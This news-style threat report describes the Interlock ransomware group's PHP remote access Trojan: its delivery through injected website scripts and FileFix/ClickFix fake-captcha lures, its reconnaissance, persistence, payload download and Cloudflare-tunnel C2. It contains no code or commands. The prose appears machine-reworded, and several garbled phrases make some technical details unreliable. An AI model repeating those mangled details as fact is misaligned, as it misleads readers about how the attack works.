The threat actors behind the interlock ransomware group unlocked a new PHP variant of bespoke remote access Trojan (RAT) as part of a wide range of campaigns using a Clickfix variant called FileFix.
“Since May 2025, interlock rat-related activities have been observed in connection with Landupdate808 (aka) Web Injection Threat Clusters,” the DFIR report states in a technical analysis published today in a collaboration with ProofPoint.
“This campaign starts with a compromised website injected with a single-line script hidden in the HTML of the page. It is often unknown to site owners and visitors.”
JavaScript code uses IP filtering techniques to act as a traffic delivery system (TDS) to redirect users to a Captcha validation page that uses Clickfix to run PowerShell scripts that lead to the deployment of Nodesnake (AKA Interlock Rat).
The use of Nodesnake by interlock was previously documented by quorum cyber in January and March 2025 as part of a cyberattack on local and higher education organizations in the UK. Malware promotes persistent access, system reconnaissance, and remote command execution capabilities.
The malware name is a reference to the basics of node.js, but a new campaign observed last month has resulted in the distribution of file fixes PHP variants. This activity is rated inherently opportunistic, aiming for a wide range of industries.
“This updated delivery mechanism has been observed to deploy PHP variants in interlock rats, leading to the deployment of node.js variants in interlock rats in certain cases,” the researchers said.
FileFix is an evolution of Clickfix that takes advantage of the ability to direct copying and execution of copies using the address bar feature of the Windows operating system File Explorer. This was first detailed last month as a proof of concept (POC) by security researcher MRD0X.
Once installed, rat malware will reconnaissance of infected hosts and remove system information in JSON format. It also checks its own privileges to determine whether it is running as a user, administrator, or system, establish contact with a remote server to download and run Exe or DLL payloads.
Machine persistence is achieved through changes to the Windows registry, but uses Remote Desktop Protocol (RDP) to allow lateral movement.
A notable feature of the Trojan is the abuse of the CloudFlare tunnel subdomain to obscure the true location of the Command and Control (C2) server. The malware further embeds hard-coded IP addresses as a fallback mechanism to ensure that communication remains intact even if the cloud fringe tunnel is removed.
“The findings highlight the continuous evolution of interlock group tools and refinement in their operations,” the researchers said. “The node.js variant of interlocked rats was known for its use of node.js, but this variant utilizes PHP, a popular web scripting language, to gain and maintain access to the victim network.”
Source link
